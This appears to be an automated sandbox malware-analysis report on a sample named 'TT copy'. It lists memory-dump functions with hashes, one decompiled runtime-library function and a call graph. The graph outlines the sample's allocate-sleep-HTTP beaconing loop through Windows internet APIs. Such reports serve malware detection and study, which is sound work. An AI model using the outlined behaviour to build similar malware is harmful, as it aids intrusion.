                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ece352522e536000e4fc812394ef4e3caa1c6cce6b9260bf055b6c7290855674
                                                                                                            • Instruction ID: 376f938bb9347ea79b635cd28f621c02317682a3f96934b6683639b9978393ad
                                                                                                            • Opcode Fuzzy Hash: ece352522e536000e4fc812394ef4e3caa1c6cce6b9260bf055b6c7290855674
                                                                                                            • Instruction Fuzzy Hash: 8B90027124100903D181719984446464109F7D0285F91C022A0814554EC6959A56BBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010AB040 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 213490a3425adda1169eccdcb714c696874ffad8932d70d74fbd6550ed12b0ff
                                                                                                            • Instruction ID: f69bd5fd0073871371c6b5edb93b170f21656b44122543e9fcb975dc86303a37
                                                                                                            • Opcode Fuzzy Hash: 213490a3425adda1169eccdcb714c696874ffad8932d70d74fbd6550ed12b0ff
                                                                                                            • Instruction Fuzzy Hash: A39002A1601145434580B19988444469115F7E1345391C131A0844560CC6A89855A3A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A98A0 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 803b3aa94a56a5752db0ec493bb492a82af64ebf8765e4c07b2bc9f613b61813
                                                                                                            • Instruction ID: daafdcdf0d71bf6865280155d751c0df7d529de79bf4f12c7444337de0ac7987
                                                                                                            • Opcode Fuzzy Hash: 803b3aa94a56a5752db0ec493bb492a82af64ebf8765e4c07b2bc9f613b61813
                                                                                                            • Instruction Fuzzy Hash: 5990026130100903D142619984546464109E7D1389F91C022E1814555DC6659953B272
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9B00 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e3c10277da79cfac3540a03de6887d3d7c2b692d4c2b4ad2f71328988aebe2f5
                                                                                                            • Instruction ID: 4eb537bc44257c3f4bbda07744b37dcf84909a67bf91afa0fac76ba321c32406
                                                                                                            • Opcode Fuzzy Hash: e3c10277da79cfac3540a03de6887d3d7c2b692d4c2b4ad2f71328988aebe2f5
                                                                                                            • Instruction Fuzzy Hash: 5A90026124100D03D1807199C4547474106E7D0645F51C021A0414554DC656996577F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010AA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 91ac3eca2d821ff01b720e0f5a017f7ce119de0297e59e34f8ae9427331ec6cf
                                                                                                            • Instruction ID: 8d0501389822e96ab2298c189f367b495d494c3e57290016e16b64dbc8bb3576
                                                                                                            • Opcode Fuzzy Hash: 91ac3eca2d821ff01b720e0f5a017f7ce119de0297e59e34f8ae9427331ec6cf
                                                                                                            • Instruction Fuzzy Hash: E790027120144503D1807199C48464B9105F7E0345F51C421E0815554CC6559856A361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9A10 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 511954aa4d11a0da0231a8ddc670d9f8b15e942f0ac152cf9a2d463d0e3bab83
                                                                                                            • Instruction ID: 9fb315e5c9df5d482adbb152993f7370174fc2365949dd116ab5483ea8628b71
                                                                                                            • Opcode Fuzzy Hash: 511954aa4d11a0da0231a8ddc670d9f8b15e942f0ac152cf9a2d463d0e3bab83
                                                                                                            • Instruction Fuzzy Hash: C090027120140903D140619988487874105E7D0346F51C021A5554555EC6A5D8917671
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9A80 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 74d6ba9090aade38a885609f70735e846acd1adfea86eca75ee783fa0d54e224
                                                                                                            • Instruction ID: f66badd0459d32653f6494bf7dbc4242b128711e8a524c6619888183db470143
                                                                                                            • Opcode Fuzzy Hash: 74d6ba9090aade38a885609f70735e846acd1adfea86eca75ee783fa0d54e224
                                                                                                            • Instruction Fuzzy Hash: DA90026120144943D18062998844B4F8205E7E1246F91C029A4546554CC95598556761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d16262c8a8e3487703591c3acea51a3a0fce3816a412dc1ae65a5545edb4b732
                                                                                                            • Instruction ID: 8f9ba858ed7cc2ddedcf5a0fa2e3c383ddcbcef30857d7ddb6667d4677e6bf4c
                                                                                                            • Opcode Fuzzy Hash: d16262c8a8e3487703591c3acea51a3a0fce3816a412dc1ae65a5545edb4b732
                                                                                                            • Instruction Fuzzy Hash: 279002E1201145934540A299C444B4A8605E7E0245B51C026E1444560CC5659851A275
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010AAD30 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d1ddf694b536ca5311477fb49a99daefd8c676180a5625f13f7807f3ec259e17
                                                                                                            • Instruction ID: 8d9c00e7c4d4d4f11679bda64bc69ecd22f6966ac8df273c3e423cd3b37f7eb0
                                                                                                            • Opcode Fuzzy Hash: d1ddf694b536ca5311477fb49a99daefd8c676180a5625f13f7807f3ec259e17
                                                                                                            • Instruction Fuzzy Hash: A9900271A05005139180719988546868106F7E0785B55C021A0904554CC9949A5563E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9560 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4fd3afa71026c7f306dff996437569de0f04402433ba3273d55c251d594373a0
                                                                                                            • Instruction ID: aee5df676edcfec8d547c8d8847076a686d777107fe845890dbb1e4c6b356c0b
                                                                                                            • Opcode Fuzzy Hash: 4fd3afa71026c7f306dff996437569de0f04402433ba3273d55c251d594373a0
                                                                                                            • Instruction Fuzzy Hash: D0900265221005030185A599464454B4545F7D6395391C025F1806590CC66198656361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A95F0 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8681d87edda1eb1c4addbe4685fde249222f9b978c414b22f6a19325ae09f522
                                                                                                            • Instruction ID: 4e14b4f5cd70e09c00b679967e0631e58806d0eb3cf7ef51010692c803b7c73d
                                                                                                            • Opcode Fuzzy Hash: 8681d87edda1eb1c4addbe4685fde249222f9b978c414b22f6a19325ae09f522
                                                                                                            • Instruction Fuzzy Hash: 2C90027120100D03D144619988446C64105E7D0345F51C021A6414655ED6A598917271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010AA710 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc0f650f22d3a531c988aa66cd650e04724fe7c5ad5f751e8d5008994ae30188
                                                                                                            • Instruction ID: 9b5f6896de95d5529840fa36ef5c28ecbba1cb5a611e194b8911bacbe3e7d66a
                                                                                                            • Opcode Fuzzy Hash: fc0f650f22d3a531c988aa66cd650e04724fe7c5ad5f751e8d5008994ae30188
                                                                                                            • Instruction Fuzzy Hash: 79900271301005539540A6D99844A8A8205E7F0345B51D025A4404554CC59498616261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9730 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27c19570a07428512b56c1311202f3ce676a33a515d476d510ccc65725f556cc
                                                                                                            • Instruction ID: b56c5894cd192bff2ab2228a67df1f1770a29d657d13a6a673d83aec058579a6
                                                                                                            • Opcode Fuzzy Hash: 27c19570a07428512b56c1311202f3ce676a33a515d476d510ccc65725f556cc
                                                                                                            • Instruction Fuzzy Hash: 8D90026160500903D180719994587464115E7D0245F51D021A0414554DC6999A5577E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9760 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9b07947780277ea6c89fa34aada6ff2e69e41d76d2d36213f96c22c2f39982d
                                                                                                            • Instruction ID: 411590eb4bf11b98f1e2a038e7b3b566f92a44de3398cf7810ee0d8720f72510
                                                                                                            • Opcode Fuzzy Hash: a9b07947780277ea6c89fa34aada6ff2e69e41d76d2d36213f96c22c2f39982d
                                                                                                            • Instruction Fuzzy Hash: 2A90027120100903D140619995487474105E7D0245F51D421A0814558DD69698517261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9770 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c17cd4270bd218e317d9f58664e68725ac3e89e2abf0afbee1502e96da568422
                                                                                                            • Instruction ID: 6a6499bddc2c82ada73bf48c9583af1f26d91ffaa7b47e2084af9a1b4ce95970
                                                                                                            • Opcode Fuzzy Hash: c17cd4270bd218e317d9f58664e68725ac3e89e2abf0afbee1502e96da568422
                                                                                                            • Instruction Fuzzy Hash: 9E90026120504943D14065999448A464105E7D0249F51D021A1454595DC6759851B271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010AA770 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af4192908fcd2100fe37d5b877be79c97b32cacded34e169afe11dc7cfa86593
                                                                                                            • Instruction ID: cffbb734da298a2266bd54190414b1835f7f70ec8564edf228e149a9588f7575
                                                                                                            • Opcode Fuzzy Hash: af4192908fcd2100fe37d5b877be79c97b32cacded34e169afe11dc7cfa86593
                                                                                                            • Instruction Fuzzy Hash: 7590027520504943D54065999844AC74105E7D0349F51D421A081459CDC6949861B261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9610 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09c1fe0dd5bac9c886a4d5358d57d83d17b5d35877bc2c20565cf7732b54a56e
                                                                                                            • Instruction ID: 89f7516487d7762606b56c806cbc6cd73ae77db570ed4682fdfb0f6ea0dbd92f
                                                                                                            • Opcode Fuzzy Hash: 09c1fe0dd5bac9c886a4d5358d57d83d17b5d35877bc2c20565cf7732b54a56e
                                                                                                            • Instruction Fuzzy Hash: B990027160500D03D190719984547864105E7D0345F51C021A0414654DC7959A5577E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9650 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86ae913df6d77abfb2e9ea49d2b468196849204d75611d6d3b8e4edd9b5a871b
                                                                                                            • Instruction ID: 94364e72c99e3a180a1da5a041251af07cd131f63b66f68262cc85cfbf90f3ec
                                                                                                            • Opcode Fuzzy Hash: 86ae913df6d77abfb2e9ea49d2b468196849204d75611d6d3b8e4edd9b5a871b
                                                                                                            • Instruction Fuzzy Hash: 9390027120504D43D18071998444A864115E7D0349F51C021A0454694DD6659D55B7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A96D0 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5155796e47ea1dc498eaf9935ecf5b1366dfb5f7b70cdd3b4828ebd95aed8d3
                                                                                                            • Instruction ID: 632fb844ab37de993d9c7df3153beaced87bdd96ed1b7c36558f1939d1dd066b
                                                                                                            • Opcode Fuzzy Hash: a5155796e47ea1dc498eaf9935ecf5b1366dfb5f7b70cdd3b4828ebd95aed8d3
                                                                                                            • Instruction Fuzzy Hash: 0790027120100D43D14061998444B864105E7E0345F51C026A0514654DC655D8517661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction ID: d6b34cff932920ecfd9f6527340fe22b29f9dbabf2513dcb5897910a59f4b893
                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010FFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E010FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E010ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E010F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E010F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                            0x010ffdda
                                                                                                            0x010ffde2
                                                                                                            0x010ffde5
                                                                                                            0x010ffdec
                                                                                                            0x010ffdfa
                                                                                                            0x010ffdff
                                                                                                            0x010ffe0a
                                                                                                            0x010ffe0f
                                                                                                            0x010ffe17
                                                                                                            0x010ffe1e
                                                                                                            0x010ffe19
                                                                                                            0x010ffe19
                                                                                                            0x010ffe19
                                                                                                            0x010ffe20
                                                                                                            0x010ffe21
                                                                                                            0x010ffe22
                                                                                                            0x010ffe25
                                                                                                            0x010ffe40

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010FFDFA
                                                                                                            Strings
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010FFE01
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010FFE2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: c2e7233d0589dfec87de1c6c6fcf5942a1d0fd9e2054646c0075d399a49cf934
                                                                                                            • Instruction ID: 63e07f5510624f9f200f489e5326c5cbb88ff453f225260973bf3e80e5759ee3
                                                                                                            • Opcode Fuzzy Hash: c2e7233d0589dfec87de1c6c6fcf5942a1d0fd9e2054646c0075d399a49cf934
                                                                                                            • Instruction Fuzzy Hash: 83F0F633640202BFE7201A85DC06F63BF5AEB44B30F140318F7A85A5D1EA62F82086F0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:7.2%
                                                                                                            Dynamic/Decrypted Code Coverage:1.3%
                                                                                                            Signature Coverage:1%
                                                                                                            Total number of Nodes:1248
                                                                                                            Total number of Limit Nodes:134
                                                                                                            execution_graph 33607 f49040 33618 f4be70 33607->33618 33609 f4915c 33610 f4907b 33610->33609 33621 f3a150 33610->33621 33612 f490b1 33626 f45ab0 33612->33626 33614 f490e0 Sleep 33617 f490cd 33614->33617 33617->33609 33617->33614 33631 f48e70 33617->33631 33649 f48c70 LdrLoadDll InternetOpenA InternetConnectA HttpSendRequestA InternetCloseHandle 33617->33649 33650 f4a500 33618->33650 33620 f4be9d 33620->33610 33623 f3a174 33621->33623 33622 f3a17b 33622->33612 33623->33622 33624 f3a1b0 LdrLoadDll 33623->33624 33625 f3a1c7 33623->33625 33624->33625 33625->33612 33627 f45aca 33626->33627 33628 f45abe 33626->33628 33627->33617 33628->33627 33657 f45f30 LdrLoadDll 33628->33657 33630 f45c1c 33630->33617 33632 f48ee6 33631->33632 33634 f48f10 33632->33634 33658 f4a940 33632->33658 33635 f4902c 33634->33635 33663 f4a9b0 33634->33663 33635->33617 33637 f48f8c 33637->33635 33668 f4aa30 33637->33668 33640 f48fc1 33641 f4ab90 2 API calls 33640->33641 33642 f48fc8 33641->33642 33642->33617 33643 f48fd2 33671 f4aab0 33643->33671 33645 f49004 33676 f4ab90 33645->33676 33647 f49025 33648 f4ab90 2 API calls 33647->33648 33648->33635 33649->33617 33653 f4af70 33650->33653 33652 f4a51c NtAllocateVirtualMemory 33652->33620 33654 f4aff5 33653->33654 33655 f4af7f 33653->33655 33654->33652 33655->33654 33656 f45ab0 LdrLoadDll 33655->33656 33656->33654 33657->33630 33659 f4a97a 33658->33659 33681 f4b080 33658->33681 33661 f4a983 InternetOpenA 33659->33661 33662 f4a99e 33659->33662 33661->33634 33662->33634 33664 f4b080 LdrLoadDll 33663->33664 33665 f4a9ef 33664->33665 33666 f4aa1f 33665->33666 33667 f4a9f8 InternetConnectA 33665->33667 33666->33637 33667->33637 33669 f4b080 LdrLoadDll 33668->33669 33670 f48fb7 33668->33670 33669->33670 33670->33640 33670->33643 33672 f4b080 LdrLoadDll 33671->33672 33673 f4aaef 33672->33673 33674 f4ab13 33673->33674 33675 f4ab06 HttpSendRequestA 33673->33675 33674->33645 33675->33645 33677 f4b080 LdrLoadDll 33676->33677 33678 f4abd2 33677->33678 33679 f4abe6 33678->33679 33680 f4abdb InternetCloseHandle 33678->33680 33679->33647 33680->33647 33682 f4b0a1 33681->33682 33683 f4b08c 33681->33683 33682->33659 33684 f45ab0 LdrLoadDll 33683->33684 33684->33682 33685 f4f2ad 33688 f4ba70 33685->33688 33689 f4ba96 33688->33689 33696 f39170 33689->33696 33691 f4baa2 33692 f4bac6 33691->33692 33704 f38450 33691->33704 33736 f4a670 33692->33736 33739 f390c0 33696->33739 33698 f3917d 33699 f39184 33698->33699 33751 f39060 33698->33751 33699->33691 33705 f38477 33704->33705 34152 f3a620 33705->34152 33707 f38489 34156 f3a370 33707->34156 33709 f384a6 33711 f384ad 33709->33711 34209 f3a2a0 LdrLoadDll 33709->34209 33733 f385f4 33711->33733 34160 f3d780 33711->34160 33713 f38516 33714 f4c0c0 2 API calls 33713->33714 33713->33733 33715 f3852c 33714->33715 33716 f4c0c0 2 API calls 33715->33716 33717 f3853d 33716->33717 33718 f4c0c0 2 API calls 33717->33718 33719 f3854e 33718->33719 34172 f3b4e0 33719->34172 33721 f38561 33722 f456b0 8 API calls 33721->33722 33723 f38572 33722->33723 33724 f456b0 8 API calls 33723->33724 33725 f38583 33724->33725 33726 f385a3 33725->33726 34184 f3c050 33725->34184 33728 f456b0 8 API calls 33726->33728 33731 f385eb 33726->33731 33734 f385ba 33728->33734 34190 f38230 33731->34190 33733->33692 33734->33731 34211 f3c0f0 6 API calls 33734->34211 33737 f4af70 LdrLoadDll 33736->33737 33738 f4a68f 33737->33738 33771 f48b90 33739->33771 33743 f390e6 33743->33698 33744 f390dc 33744->33743 33778 f4b320 33744->33778 33746 f39123 33746->33743 33789 f38ee0 33746->33789 33748 f39143 33795 f38930 LdrLoadDll 33748->33795 33750 f39155 33750->33698 33752 f39070 33751->33752 34130 f4b610 33752->34130 33755 f4b610 LdrLoadDll 33756 f3908b 33755->33756 33757 f4b610 LdrLoadDll 33756->33757 33758 f390a1 33757->33758 33759 f3d580 33758->33759 33760 f3d599 33759->33760 34134 f3a4a0 33760->34134 33762 f3d5ac 34138 f4a1a0 33762->34138 33765 f39195 33765->33691 33767 f3d5d2 33768 f3d5fd 33767->33768 34144 f4a220 33767->34144 33770 f4a450 2 API calls 33768->33770 33770->33765 33772 f48b9f 33771->33772 33773 f45ab0 LdrLoadDll 33772->33773 33774 f390d3 33773->33774 33775 f48a40 33774->33775 33796 f4a5c0 33775->33796 33779 f4b339 33778->33779 33799 f456b0 33779->33799 33781 f4b351 33782 f4b35a 33781->33782 33838 f4b160 33781->33838 33782->33746 33784 f4b36e 33784->33782 33855 f49ec0 33784->33855 34108 f37220 33789->34108 33791 f38f01 33791->33748 33792 f38efa 33792->33791 34121 f374e0 33792->34121 33795->33750 33797 f4af70 LdrLoadDll 33796->33797 33798 f48a55 33797->33798 33798->33744 33800 f459e5 33799->33800 33801 f456c4 33799->33801 33800->33781 33801->33800 33863 f49c10 33801->33863 33804 f457f0 33866 f4a320 33804->33866 33805 f457d3 33923 f4a420 LdrLoadDll 33805->33923 33808 f457dd 33808->33781 33809 f45817 33810 f4bef0 2 API calls 33809->33810 33811 f45823 33810->33811 33811->33808 33812 f459a9 33811->33812 33814 f459bf 33811->33814 33818 f458b2 33811->33818 33813 f4a450 2 API calls 